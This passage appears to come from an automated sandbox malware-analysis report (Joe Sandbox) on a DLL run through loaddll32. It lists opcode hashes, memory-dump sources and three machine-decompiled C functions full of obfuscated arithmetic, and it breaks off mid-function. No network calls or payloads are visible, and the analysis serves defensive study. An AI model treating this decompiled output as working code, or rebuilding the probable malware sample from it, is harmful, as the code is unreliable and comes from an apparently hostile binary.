            • Opcode ID: ca4d8173ee75e7154eb051e302a31911b52c2221cccfc35c0db9e48ae809487c
            • Instruction ID: 6831073a72cdfb54eeb63fb0fec34d30a96a907b4523f69795bc3e0711e5e5e3
            • Opcode Fuzzy Hash: ca4d8173ee75e7154eb051e302a31911b52c2221cccfc35c0db9e48ae809487c
            • Instruction Fuzzy Hash: 7B4224766083108FDB1ADF19C480A2ABBF1FBCA348F12492EF98687751D7B5A851CF51
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 84%
            			E6D519823() {
            				signed int _t221;
            				signed int _t222;
            				signed short _t224;
            				intOrPtr _t235;
            				signed int _t254;
            				void* _t264;
            				signed int _t274;
            				signed int _t275;
            				intOrPtr _t297;
            				signed int _t301;
            				intOrPtr _t302;
            				intOrPtr _t315;
            				intOrPtr _t325;
            				intOrPtr _t332;
            				signed int _t335;
            				signed int _t336;
            				signed char _t339;
            				signed int _t341;
            				signed int _t345;
            				signed int _t347;
            				intOrPtr _t350;
            				signed int* _t353;
            				intOrPtr _t358;
            				signed int* _t367;
            				signed int _t372;
            				signed int _t375;
            				signed int _t376;
            				signed int _t382;
            				signed short _t384;
            				intOrPtr _t385;
            				signed int* _t386;
            				signed char _t394;
            				signed char _t395;
            				signed int _t415;
            				signed int _t418;
            				intOrPtr _t420;
            				signed int _t422;
            				intOrPtr _t424;
            				signed int _t425;
            				signed int _t430;
            				signed int _t433;
            				void* _t434;
            				void* _t435;
            				void* _t437;
            				void* _t445;
            
            				_t221 =  *0x6d55d57c; // 0x0
            				_t222 = _t221 - 1;
            				 *0x6d55d57c = _t222;
            				 *(_t434 + 0x14) =  *( *((intOrPtr*)(_t434 + 0x48)) + _t222 * 2) & 0x0000ffff;
            				_t224 =  *0x6d55d5c4; // 0x0
            				 *0x6d55d5c4 = _t224 + 0xffff;
            				_t422 =  *(_t434 + 0x4c) & 0x000000ff;
            				 *(_t434 + 0x30) = _t224 & 0x0000ffff;
            				_t345 =  *0x6d55d5e0; // 0x0
            				 *(_t434 + 0x38) = ( *( *((intOrPtr*)(_t434 + 0x3c)) + _t422 * 4) & 0x000000ff) * _t345;
            				asm("cdq");
            				 *0x6d55d588 =  *0x6d55d588 + 0xffff;
            				_t335 =  *(_t434 + 0x44);
            				 *(_t434 + 0x28) = ( *( *((intOrPtr*)(_t434 + 0x5c)) + 0x1de2) & 0x000000ff) %  *( *((intOrPtr*)(_t434 + 0x40)) + _t422 * 4);
            				_t430 = 0xc01 / _t335;
            				 *0x6d55d5e0 = _t345 - 1;
            				 *(_t434 + 0x18) =  *0x6d55d59c & 0x0000ffff;
            				_t235 =  *0x6d55d5d8; // 0x0
            				_t415 =  *( *((intOrPtr*)(_t434 + 0x20)) + _t422 * 4);
            				 *(_t434 + 0x24) = _t430;
            				 *(_t434 + 0x10) = _t235 + _t335;
            				 *(_t434 + 0x14) = _t415;
            				_t435 = _t415 -  *0x6d55d5b0; // 0x0
            				if(_t435 == 0) {
            					L4:
            					_t347 =  *0x6d55d5c0 & 0x0000ffff;
            					_t336 =  *(_t434 + 0x34) & 0x0000ffff;
            					if(_t336 >=  *((intOrPtr*)(_t430 + _t347 * 4))) {
            						L19:
            						asm("cdq");
            						 *(0xa72 +  *0x177e * 4) = ( *(_t434 + 0x50) + 0x00000001 & 0x000000ff) %  *( *((intOrPtr*)(_t434 + 0x40)) + 0x6230);
            						_t382 = ( *0x6d55d59c & 0x0000ffff) -  *0x6d55d5ac;
            						_t350 =  *0x6d55d570; // 0x0
            						 *0x6d55d5ac = _t382;
            						return  *( *(_t434 + 0x34) + 0x3d50) & 0x0000ffff |  *(_t350 + _t382 * 4);
            					}
            					_t424 =  *((intOrPtr*)(_t434 + 0x54));
            					 *(_t434 + 0x1c) = _t336 + _t336;
            					do {
            						asm("cdq");
            						asm("cdq");
            						_t384 = (_t336 / 0x00001222 | _t336) % _t347;
            						 *0x6d55d5c0 = _t384;
            						 *((short*)(_t424 + (_t384 & 0x0000ffff) * 2)) = (_t336 & 0x0000ffff) * (_t336 & 0x0000ffff) -  *((intOrPtr*)(_t424 + (_t384 & 0x0000ffff) * 2));
            						_t254 =  *0x6d55d5d4; // 0x0
            						 *(_t430 + _t254 * 4) =  *(_t430 + _t254 * 4) ^ _t336;
            						 *0x6d55d5d4 =  *0x6d55d5d4 + 1;
            						_t385 =  *0x6d55d5a8; // 0x0
            						_t418 =  *( *(_t434 + 0x28) +  *( *(_t434 + 0x18)) * 2) & 0x0000ffff;
            						if(_t418 >  *((intOrPtr*)(_t385 + 0x297c))) {
            							goto L18;
            						}
            						_t353 = 0x177e;
            						 *(_t434 + 0x38) = (_t336 & 0x000000ff) * 0x000000ce | _t336;
            						 *(_t434 + 0x18) = _t418 * 4 + _t430;
            						 *(_t434 + 0x34) = 0x177e - _t430;
            						_t264 = 0x20;
            						 *((intOrPtr*)(_t434 + 0x2c)) = _t264 - _t430;
            						while(1) {
            							_t386 =  *(_t434 + 0x10);
            							_t386[ *( *(_t434 + 0x10))] =  *(_t385 +  *_t353 * 4);
            							 *(_t434 + 0x10) = _t386 - 4;
            							 *0x177e =  *0x177e - 1;
            							asm("cdq");
            							_t358 =  *0x6d55d594; // 0x0
            							 *0x6d55d5b8 =  *0x6d55d5b8 ^  *(_t434 + 0x1c) / ( *(_t424 +  *0x177e * 2) & 0x0000ffff) ^  *(_t424 + 0x2d6c) & 0x0000ffff;
            							 *0x6d55d58a =  *(_t434 + 0x34);
            							_t274 =  *0x6d55d578; // 0x0
            							_t275 =  *0x6d55d5e0; // 0x0
            							if(( *(_t424 + _t274 * 2) & 0x0000ffff) <  *((intOrPtr*)(_t358 + _t275 * 8)) || ( *( *0x177e +  *((intOrPtr*)(_t434 + 0x48))) & 0x000000ff) >= _t418) {
            								goto L24;
            							}
            							L11:
            							_t394 =  *(_t434 + 0x50);
            							_t425 = _t394 & 0x000000ff;
            							 *0x6d55d5d0 =  *0x6d55d5d0 + 0xffff;
            							_t430 =  *(_t434 + 0x24);
            							if( *((intOrPtr*)( *((intOrPtr*)(_t434 + 0x20)) + _t425 * 4)) == ( *0x6d55d5d0 & 0x0000ffff) ||  *((intOrPtr*)( *(_t434 + 0x30) +  *(_t434 + 0x14))) >=  *((intOrPtr*)(0xa72 + _t425 * 4))) {
            								 *((char*)(_t425 +  *((intOrPtr*)(_t434 + 0x5c)))) = (_t336 |  *0x6d55d5a0) -  *((intOrPtr*)(_t425 +  *((intOrPtr*)(_t434 + 0x5c))));
            							} else {
            								if( *0x6d55d5dc <= 0xa5b) {
            									L20:
            									if( *(_t434 + 0x38) >= _t336) {
            										 *0x177e =  *0x177e + 1;
            										if(( *( *((intOrPtr*)(_t434 + 0x58)) +  *0x177e * 2) & 0x0000ffff) <= _t418) {
            											_t395 = _t394 - 1;
            											 *(_t434 + 0x50) = _t395;
            											_t297 =  *0x6d55d5dc; // 0x0
            											_t367 =  *(_t434 + 0x14);
            											 *( *((intOrPtr*)(_t434 + 0x40)) + (_t395 & 0x000000ff) * 4) = (_t297 + 0x16e9) % ( *( *((intOrPtr*)(_t434 + 0x54)) + (_t395 & 0x000000ff) * 2) & 0x0000ffff) *  *_t367;
            											_t301 =  *0x6d55d578; // 0x0
            											 *0x6d55d5a0 = _t301;
            											_t302 =  *0x6d55d5c8; // 0x0
            											asm("cdq");
            											 *0x6d55d5ac =  *(_t367 +  *((intOrPtr*)(_t434 + 0x2c)) + _t302) / _t336;
            										}
            									}
            									L16:
            									_t424 =  *((intOrPtr*)(_t434 + 0x54));
            									L17:
            									_t385 =  *0x6d55d5a8; // 0x0
            									_t418 = _t418 + 1;
            									 *(_t434 + 0x14) =  *(_t434 + 0x14) + 4;
            									if(_t418 <=  *((intOrPtr*)(_t385 + 0x297c))) {
            										_t353 = 0x177e;
            										_t386 =  *(_t434 + 0x10);
            										_t386[ *( *(_t434 + 0x10))] =  *(_t385 +  *_t353 * 4);
            										 *(_t434 + 0x10) = _t386 - 4;
            										 *0x177e =  *0x177e - 1;
            										asm("cdq");
            										_t358 =  *0x6d55d594; // 0x0
            										 *0x6d55d5b8 =  *0x6d55d5b8 ^  *(_t434 + 0x1c) / ( *(_t424 +  *0x177e * 2) & 0x0000ffff) ^  *(_t424 + 0x2d6c) & 0x0000ffff;
            										 *0x6d55d58a =  *(_t434 + 0x34);
            										_t274 =  *0x6d55d578; // 0x0
            										_t275 =  *0x6d55d5e0; // 0x0
            										if(( *(_t424 + _t274 * 2) & 0x0000ffff) <  *((intOrPtr*)(_t358 + _t275 * 8)) || ( *( *0x177e +  *((intOrPtr*)(_t434 + 0x48))) & 0x000000ff) >= _t418) {
            											goto L24;
            										}
            									}
            									break;
            								}
            								_t445 =  *0x6d55d5c0 - 0x861; // 0x0
            								if(_t445 <= 0) {
            									goto L20;
            								}
            								 *0x6d55d590 = ( *0x6d55d5d0 & 0x0000ffff ^ 0x00000df7) %  *0x6d55d590;
            								 *(_t430 + _t336 * 8) = _t418 /  *(_t434 + 0x44) | _t418;
            								 *0x6d55d5a4 =  *(_t425 * 0xc +  *(_t434 + 0x18)) /  *0x6d55d5a4;
            								_t315 =  *0x6d55d5c8; // 0x0
            								 *((intOrPtr*)(_t315 + _t336 * 4)) = _t418 + _t336;
            							}
            							goto L16;
            							L24:
            							 *(_t434 + 0x50) =  *(_t434 + 0x50) + 1;
            							 *(1 + ( *(_t434 + 0x50) & 0x000000ff) * 0xc) = ( *( *(_t434 + 0x28) + ( *(_t434 + 0x50) & 0x000000ff) * 2) & 0x0000ffff) * _t418 /  *(1 + ( *(_t434 + 0x50) & 0x000000ff) * 0xc);
            							( *(_t434 + 0x10))[ *( *(_t434 + 0x18))] = ( *(_t434 + 0x10))[ *( *(_t434 + 0x18))] * _t418;
            							goto L17;
            						}
            						L18:
            						_t347 =  *0x6d55d5c0 & 0x0000ffff;
            						_t336 = _t336 + 1;
            						 *(_t434 + 0x1c) =  *(_t434 + 0x1c) + 2;
            					} while (_t336 <  *((intOrPtr*)(_t430 + _t347 * 4)));
            					goto L19;
            				} else {
            					 *(_t434 + 0x1c) = _t335 - _t415;
            					do {
            						_push( *(_t434 + 0x14));
            						 *( *0x6d55d5ac * 3 +  *((intOrPtr*)(_t434 + 0x48))) = 0x1e03 % ( *( *0x6d55d5ac * 3 +  *((intOrPtr*)(_t434 + 0x48))) & 0x000000ff);
            						_t372 =  *0x6d55d5d4; // 0x0
            						asm("cdq");
            						_t339 =  *0x6d55d58a; // 0x0
            						 *(_t434 + 0x30) = (_t372 | 0x00000846) & 0x0000ffff;
            						 *(_t434 + 0x34) = _t415 % _t372;
            						asm("cdq");
            						_t325 =  *0x6d55d580; // 0x0
            						_t375 =  *0x6d55d57c; // 0x0
            						_t433 =  *0x6d55d598; // 0x0
            						 *0x6d55d580 = _t325 - 1;
            						 *0x6d55d58a = _t339 - 1;
            						asm("cdq");
            						_push( *0x6d55d5a4);
            						_t341 =  *(_t434 + 0x24);
            						_t59 = _t433 + 0x1e5c; // 0x1e5c
            						_push(_t375);
            						_push(_t375 % _t433);
            						_push(_t325);
            						_push(_t415 % (_t339 & 0x000000ff));
            						_t420 =  *((intOrPtr*)(_t434 + 0x2c));
            						_push(_t341);
            						_push( *((intOrPtr*)(_t434 + 0x48)));
            						_push( *(_t434 + 0x50));
            						_push(0x584);
            						_push(_t420 -  *((intOrPtr*)(_t434 + 0x78)));
            						_t332 = E6D505338();
            						_t376 =  *0x6d55d598; // 0x0
            						_t434 = _t434 + 0x30;
            						_t415 = _t420 + 1;
            						 *(_t434 + 0x14) = _t415;
            						 *(_t434 + 0x1c) = _t341 - 1;
            						 *((intOrPtr*)( *(_t434 + 0x10) + _t376 * 8)) = _t332;
            						_t437 = _t415 -  *0x6d55d5b0; // 0x0
            					} while (_t437 != 0);
            					_t430 =  *(_t434 + 0x24);
            					goto L4;
            				}
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: ea43cd46c43b10678b5990a64245ea443176515cc36b91ad4757b32ea0417f04
            • Instruction ID: d0765a43f9348067e43d3ed47c40dbc613b252c9fc6f3d41baa4c174753c1875
            • Opcode Fuzzy Hash: ea43cd46c43b10678b5990a64245ea443176515cc36b91ad4757b32ea0417f04
            • Instruction Fuzzy Hash: 29D167766082508FCB06CF1DC490A2ABBF1FBCA308F15486EF886C7661D774A855CF52
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 96%
            			E6D516399() {
            				signed int _t249;
            				intOrPtr _t253;
            				signed int _t256;
            				intOrPtr _t266;
            				signed int _t274;
            				signed int _t280;
            				signed int _t289;
            				signed int _t295;
            				signed int _t299;
            				signed int _t306;
            				intOrPtr _t317;
            				signed int _t332;
            				signed int _t333;
            				signed int _t336;
            				signed int* _t346;
            				signed int _t353;
            				intOrPtr _t356;
            				signed int _t358;
            				signed int _t360;
            				signed int _t371;
            				signed int* _t374;
            				signed int* _t379;
            				intOrPtr _t385;
            				signed int _t388;
            				signed int _t401;
            				intOrPtr _t418;
            				intOrPtr _t430;
            				signed int _t435;
            				signed int _t436;
            				signed int* _t441;
            				void* _t444;
            				intOrPtr* _t447;
            				signed int* _t449;
            				void* _t451;
            				void* _t454;
            
            				_t449 =  *(_t451 + 0x58);
            				_t356 =  *((intOrPtr*)(_t451 + 0x5c));
            				 *(_t451 + 0x2c) = _t449[0x1e17];
            				_t435 =  *0x6d55d5b4 * 0x1281;
            				 *0x6d55d59c =  *0x6d55d59c + 0xffff;
            				_t249 =  *0x6d55d5ac; // 0x0
            				_t441 =  *(_t356 + 0x3c40);
            				 *(_t451 + 0x3c) = _t249;
            				 *(_t451 + 0x40) = 0xc68 %  *0x6d55d5a4;
            				 *(_t451 + 0x30) = _t441;
            				_t401 =  *0x6d55d578; // 0x0
            				 *(_t451 + 0x48) =  *( *_t449 +  *((intOrPtr*)(_t451 + 0x68))) & 0x15;
            				_t253 =  *0x6d55d590; // 0x0
            				 *((intOrPtr*)(_t451 + 0x44)) = _t253;
            				 *((intOrPtr*)(_t451 + 0x38)) =  *((intOrPtr*)(_t356 + 0x328c)) +  *0x6d55d5a4;
            				_t256 =  *0x6d55d5b0; // 0x0
            				 *(_t451 + 0x64) = _t401;
            				 *(_t451 + 0x28) = _t256;
            				if(_t256 <=  *((intOrPtr*)( *(_t451 + 0x40) + 0x5098))) {
            					 *(_t451 + 0x10) = _t435 << 4;
            					 *(_t451 + 0x20) =  &(_t441[_t256]);
            					 *((intOrPtr*)(_t451 + 0x34)) = (_t256 << 4) + _t356;
            					 *(_t451 + 0x18) = 0x1b97 + _t435 * 4;
            					 *(_t451 + 0x14) =  &(_t441[_t435 + 5]);
            					 *((intOrPtr*)(_t451 + 0x4c)) = 0x1477 - _t441;
            					do {
            						_t274 =  *0x6d55d580; // 0x0
            						 *( *(_t451 + 0x48) + _t274 * 4) = _t449[0xab9] /  *( *(_t451 + 0x48) + _t274 * 4);
            						asm("cdq");
            						_t280 =  *0x6d55d5d4; // 0x0
            						_t371 =  *((intOrPtr*)(_t451 + 0x4c)) +  *(_t451 + 0x20);
            						 *0x6d55d578 = ( *( *(_t451 + 0x28) +  *((intOrPtr*)(_t451 + 0x44))) & 0x000000ff) %  *(_t356 + 0x24dc);
            						 *(_t451 + 0x24) = _t371;
            						 *((intOrPtr*)(_t371 +  *(_t451 + 0x3c) - 0x1477)) = (_t280 ^ 0x00000d7f) + 0x1475;
            						asm("cdq");
            						_t374 =  *(_t451 + 0x64);
            						 *(_t451 + 0x64) = _t374 - 4;
            						 *( *((intOrPtr*)(_t451 + 0x38)) +  *_t374 * 4) = ( *(_t356 + 0x98 + (( *0x6d55d588 & 0x0000ffff) + ( *0x6d55d588 & 0x0000ffff)) * 8) |  *(_t356 +  *_t449 * 4)) % 0x6c5;
            						_t289 =  *0x6d55d5ac; // 0x0
            						_t441 =  *(_t451 + 0x30);
            						_t449[_t289] = _t449[_t289] | 0x00001d94;
            						 *0x6d55d5d4 =  *0x6d55d5d4 + 0x18fd;
            						 *0x6d55d588 =  *0x6d55d588 & _t449[0x1e30] & 0x00001adb;
            						 *((intOrPtr*)(_t356 + ( *0x6d55d5c0 & 0x0000ffff) * 4)) =  *((intOrPtr*)(_t356 + ( *0x6d55d5c0 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x1477 + _t435 * 4)) +  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x34))));
            						_t454 =  *0x6d55d5c4 - 0x365; // 0x0
            						if(_t454 < 0) {
            							_t295 =  *0x6d55d584; // 0x0
            							if(_t295 <  *((intOrPtr*)(_t449 +  *(_t451 + 0x10)))) {
            								goto L4;
            							} else {
            								_t379 =  *(_t451 + 0x64);
            								_t332 =  *_t379;
            								if(_t441[_t332] > 0xfeb) {
            									goto L5;
            								} else {
            									_t333 = _t332 - 1;
            									 *(_t451 + 0x18) =  &(( *(_t451 + 0x18))[1]);
            									 *_t379 = _t333;
            									 *(_t451 + 0x14) =  &(( *(_t451 + 0x14))[1]);
            									 *(_t451 + 0x10) =  *(_t451 + 0x10) + 0x10;
            									_t131 = _t333 + 0x4ae33; // 0x4ae32
            									 *(_t131 << 4) =  *(_t131 << 4) *  *0x6d55d5dc;
            									_t336 = _t435;
            									asm("cdq");
            									_t435 = _t435 + 1;
            									 *0x6d55d58a = _t336 / ( *0x6d55d58a & 0x000000ff);
            									 *_t441 =  *_t441 + 1;
            									_t430 =  *((intOrPtr*)(_t451 + 0x68));
            									 *((char*)(_t430 +  *( *(_t451 + 0x64)))) =  *((intOrPtr*)(0x1e37 +  *_t441 * 0xc));
            									 *((intOrPtr*)((( *0x6d55d5c0 & 0x0000ffff) << 4) + 0x1b0f)) =  *((intOrPtr*)(_t356 + 0x62c)) + 0x174d;
            									 *0x6d55d5c0 =  *0x6d55d5c0 + 1;
            									 *((intOrPtr*)( *0x6d55d580 * 0xc +  *((intOrPtr*)(_t451 + 0x38)) + 0x1c)) = 0x18b5;
            									 *( *(_t451 + 0x18)) = ( *(_t430 + 0x140e) & 0x000000ff ^ 0x000009cc) %  *( *(_t451 + 0x18));
            								}
            							}
            						} else {
            							_t346 =  *(_t451 + 0x64);
            							 *_t346 =  *_t346 + 1;
            							_t441 =  *(_t451 + 0x30);
            							_t441[ *_t346] = 0x14a3 /  *( *(_t451 + 0x14)) - _t441[ *_t346];
            							 *0x6d55d5e4 =  *(_t356 + 0x5ec4);
            							 *0x6d55d5b0 =  *0x6d55d5b0 ^ 0x00001e76;
            							 *0x6d55d59c =  *( *(_t451 + 0x24));
            							_t353 =  *0x6d55d5ac; // 0x0
            							 *0x6d55d5ac = _t353 + 0x12ee + _t435;
            							L4:
            							_t379 =  *(_t451 + 0x64);
            							L5:
            							_t418 =  *((intOrPtr*)(_t451 + 0x68));
            							_t435 = _t435 - 1;
            							 *(_t451 + 0x14) =  *(_t451 + 0x14) - 4;
            							 *(_t451 + 0x18) =  *(_t451 + 0x18) - 4;
            							 *(_t451 + 0x10) =  *(_t451 + 0x10) - 0x10;
            							 *(_t451 + 0x24) =  *(_t435 + _t418) & 0x000000ff;
            							 *(_t451 + 0x58) = _t435;
            							_t449 =  *(_t451 + 0x60);
            							if( *(_t451 + 0x24) ==  *( *(_t451 + 0x20))) {
            								 *((intOrPtr*)(_t451 + 0x1c)) = _t356 +  *(_t451 + 0x24) * 4;
            								 *((intOrPtr*)(_t451 + 0x50)) =  *(_t451 + 0x2c) - _t356;
            								 *((intOrPtr*)(_t451 + 0x54)) = _t449 - _t356;
            								while(1) {
            									_t306 =  *0x6d55d580; // 0x0
            									_t447 =  *((intOrPtr*)(_t451 + 0x1c));
            									 *((intOrPtr*)(_t451 + 0x1c)) =  *((intOrPtr*)(_t451 + 0x1c)) + 4;
            									 *0x6d55d5e4 =  *((intOrPtr*)( *(_t451 + 0x2c) + _t306 * 4)) +  *((intOrPtr*)( *((intOrPtr*)(_t451 + 0x50)) + _t447)) -  *0x6d55d5e4 +  *_t447;
            									 *((intOrPtr*)(0x1dff +  *_t379 * 4)) = 0x1184;
            									 *0x6d55d584 =  *0x6d55d584 ^ (( *( *_t449 + _t418) & 0x000000ff) - 0x000004fe & 0x00000af0) -  *((intOrPtr*)(_t356 + 0x4060));
            									_t317 =  *0x6d55d5bc; // 0x0
            									 *(_t317 +  *_t449 * 4) = _t449[ *0x6d55d5c0 & 0x0000ffff] /  *(_t317 +  *_t449 * 4);
            									 *(_t451 + 0x64) =  &(( *(_t451 + 0x64))[1]);
            									asm("cdq");
            									 *( *(_t451 + 0x3c) + ( *( *(_t451 + 0x64)) << 4)) = 0x4f1 %  *( *(_t451 + 0x3c) + ( *( *(_t451 + 0x64)) << 4));
            									_t385 =  *0x6d55d5c8; // 0x0
            									 *( *(_t451 + 0x10) + _t385) =  *( *(_t451 + 0x10) + _t385) & ( *( *((intOrPtr*)(_t451 + 0x68)) + 0x1483) & 0x000000ff &  *(_t451 + 0x28)) -  *((intOrPtr*)( *(_t451 + 0x2c) + 0x2084));
            									_t388 =  *(_t451 + 0x24) + 1;
            									 *(_t451 + 0x24) = _t388;
            									 *0x6d55d5ac =  *( *((intOrPtr*)(_t451 + 0x54)) + _t447) * 0x160d % _t449[0xbd6] *  *0x6d55d5ac;
            									if(_t388 !=  *( *(_t451 + 0x20))) {
            										break;
            									}
            									_t379 =  *(_t451 + 0x64);
            									_t418 =  *((intOrPtr*)(_t451 + 0x68));
            								}
            								_t435 =  *(_t451 + 0x58);
            								_t441 =  *(_t451 + 0x30);
            							}
            						}
            						_t299 =  *(_t451 + 0x28) + 1;
            						 *((intOrPtr*)(_t451 + 0x34)) =  *((intOrPtr*)(_t451 + 0x34)) + 0x10;
            						 *(_t451 + 0x20) =  &(( *(_t451 + 0x20))[1]);
            						 *(_t451 + 0x28) = _t299;
            					} while (_t299 <=  *((intOrPtr*)( *(_t451 + 0x40) + 0x5098)));
            				}
            				 *0x6d55d5e4 =  *0x6d55d5e4 & 0x00000892;
            				_t436 = _t435 - 1;
            				_t358 =  *0x6d55d598; // 0x0
            				 *((_t358 << 4) + 0x1dff) = ( *(0x1473 + _t435 * 4) % _t436 + _t441[0x6d7]) *  *((_t358 << 4) + 0x1dff);
            				_t360 =  *0x6d55d5d4; // 0x0
            				 *0x6d55d598 =  *0x6d55d598 - 1;
            				 *(0x4ae2b4 + _t360 * 4) = 0xf1b /  *(0x4ae2b4 + _t360 * 4);
            				_t444 = 0xdc0 - _t449[_t436 - 1] - _t436 - 1;
            				 *0x6d55d5c0 = (_t449[0x221] / 0x00000dc0 + 0x000009f5 |  *(_t356 + 0x6f50)) / ( *0x6d55d5c0 & 0x0000ffff);
            				_t266 =  *0x6d55d5e0; // 0x0
            				 *(_t266 +  *((intOrPtr*)(_t451 + 0x44))) =  *(_t266 +  *((intOrPtr*)(_t451 + 0x44))) & 0x000000f8;
            				_t244 = _t444 + 0x1399; // 0x2159
            				return _t244;
            			}

            Memory Dump Source
            • Source File: 00000000.00000002.396475289.000000006D501000.00000020.00000001.01000000.00000003.sdmp, Offset: 6D500000, based on PE: true
            • Associated: 00000000.00000002.396471857.000000006D500000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396487108.000000006D51B000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396507464.000000006D540000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396511100.000000006D541000.00000008.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396523813.000000006D55C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.396528397.000000006D55F000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_6d500000_loaddll32.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 263b757a136f23bc738ddcada74779d7fc088c9c2e2417afb1073087ab002416
            • Instruction ID: 6420dcac2c0070e736d6e456e38bfbd2f56387692535c95221582b19ce2f4c85
            • Opcode Fuzzy Hash: 263b757a136f23bc738ddcada74779d7fc088c9c2e2417afb1073087ab002416
            • Instruction Fuzzy Hash: 04E11576608341CFDB05CF19C480A6ABBF1FB8A308F15496EE88A8B761D774E945CF42
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 94%
            			E6D51755D(intOrPtr _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, intOrPtr _a28, signed short* _a32, intOrPtr _a40) {
            				signed int _v4;
            				signed int _v8;
            				intOrPtr _v12;
            				signed short* _v16;
            				signed int _v20;
            				signed int _v24;
            				signed char _v25;
            				void* _t195;
            				intOrPtr _t197;
            				signed int _t199;
            				signed int _t214;
            				signed int _t218;
            				intOrPtr _t226;
            				signed int _t229;
            				signed int _t230;
            				signed int _t235;
            				signed int _t239;
            				signed int _t241;
            				intOrPtr _t242;
            				signed int _t245;
            				signed int _t246;
            				signed char _t248;
            				intOrPtr _t255;
            				signed int _t256;
            				intOrPtr _t258;
            				signed int _t260;
            				intOrPtr _t262;
            				signed int _t276;
            				signed int _t286;
            				signed char _t287;
            				signed int _t289;
            				signed int _t290;
            				signed int _t291;
            				intOrPtr _t294;
            				signed int _t298;
            				intOrPtr _t302;
            				signed int _t308;
            				signed int _t312;
            				signed int _t313;
            				signed int _t318;
            				signed int _t331;
            				signed int _t332;
            				signed short _t333;
            				intOrPtr _t340;
            				intOrPtr _t342;
            				signed int _t343;
            				signed short* _t362;
            				signed short* _t363;
            				signed short* _t364;
            				intOrPtr _t366;
            				signed int _t367;
            				signed int _t369;
            				intOrPtr _t370;
            				signed int _t371;
            				signed short _t372;
            				signed short _t373;
            				signed int _t374;
            				signed int _t375;
            
            				_t372 =  *0x6d55d5c0; // 0x0
            				_t294 =  *0x6d55d570; // 0x0
            				_t195 = 0x13;
            				_v16 = _t195 -  *0x6d55d5e4;
            				_t197 =  *0x6d55d5a4; // 0x0
            				_v12 = _t197;
            				 *0x6d55d5a4 = _t197 + 1;
            				_t199 =  *0x6d55d58c; // 0x0
            				_v24 = _t199;
            				_t373 = _t372 + 0xffff;
            				 *0x6d55d5c0 = _t373;
            				_t287 =  *0x6d55d584; // 0x0
            				_v25 = _t287;
            				_v4 =  *(( *_a32 & 0x0000ffff) * 0xc + _t294) ^  *(_a16 + 0x47b4);
            				_v8 =  *0x6d55d598 * 0xc;
            				asm("cdq");
            				_t331 =  *0x6d55d5b8; // 0x0
            				_t362 = _a32;
            				_v20 =  *(_a28 + 0x1528) /  *(_v8 + _t294) & 0x0000ffff;
            				_t332 = _t331 + 1;
            				 *0x6d55d5b8 = _t332;
            				if((_t372 & 0x0000ffff) != _t331) {
            					_t366 = _a8;
            					__eflags =  *0x6d55d57c - ( *(_t366 + ( *_v16 & 0x0000ffff) * 2) & 0x0000ffff); // 0x0
            					if(__eflags == 0) {
            						L19:
            						_t333 = _v20;
            						 *(_a4 + (_t333 & 0x0000ffff) * 4) =  *(_a4 + (_t333 & 0x0000ffff) * 4) ^ 0xfffff5d6;
            						_t214 =  *0x6d55d5b4; // 0x0
            						_v20 = _t333 + 1;
            						_t218 =  *0x6d55d5e0; // 0x0
            						 *0x6d55d58a = _t214 % 0x18ac % 0x1249;
            						_t340 =  *((intOrPtr*)(_a16 + _t218 * 4));
            						__eflags = _t340 - 0x1c7;
            						if(_t340 != 0x1c7) {
            							goto L6;
            						} else {
            							_t374 = _v24;
            							do {
            								 *(_t374 + ( *0x6d55d59c & 0x0000ffff) * 8) =  *(_t374 + ( *0x6d55d59c & 0x0000ffff) * 8) ^  *(_t366 + 0x371e) & 0x0000ffff;
            								_t312 =  *0x6d55d5d4; // 0x0
            								_t258 =  *0x6d55d5a8; // 0x0
            								_t313 = _t312 + 1;
            								 *0x6d55d5d4 = _t313;
            								 *((intOrPtr*)(_t258 + (_t313 + _t313) * 8)) = _t340;
            								_t340 = _t340 + 1;
            								__eflags = _t340 - 0x1c7;
            							} while (_t340 == 0x1c7);
            							goto L7;
            						}
            						goto L30;
            					} else {
            						_t370 = _v12;
            						_t260 = ( *_t362 & 0x0000ffff) + ( *_t362 & 0x0000ffff);
            						 *0x6d55d5c0 = _t373 + 1;
            						__eflags =  *((intOrPtr*)(_t370 + _t260 * 8)) - (_t373 & 0x0000ffff);
            						if( *((intOrPtr*)(_t370 + _t260 * 8)) < (_t373 & 0x0000ffff)) {
            							_t366 = _a8;
            							goto L19;
            						} else {
            							_t371 =  *0x6d55d580; // 0x0
            							_t262 = _a40;
            							__eflags =  *((intOrPtr*)(_t262 + 4 + _t371 * 4)) - 0x1c74;
            							if( *((intOrPtr*)(_t262 + 4 + _t371 * 4)) < 0x1c74) {
            								__eflags = _t332 - 0x187f;
            								if(_t332 == 0x187f) {
            									L15:
            									__eflags = _t332 - 0x1379;
            									if(_t332 != 0x1379) {
            										goto L17;
            									} else {
            										goto L16;
            									}
            								} else {
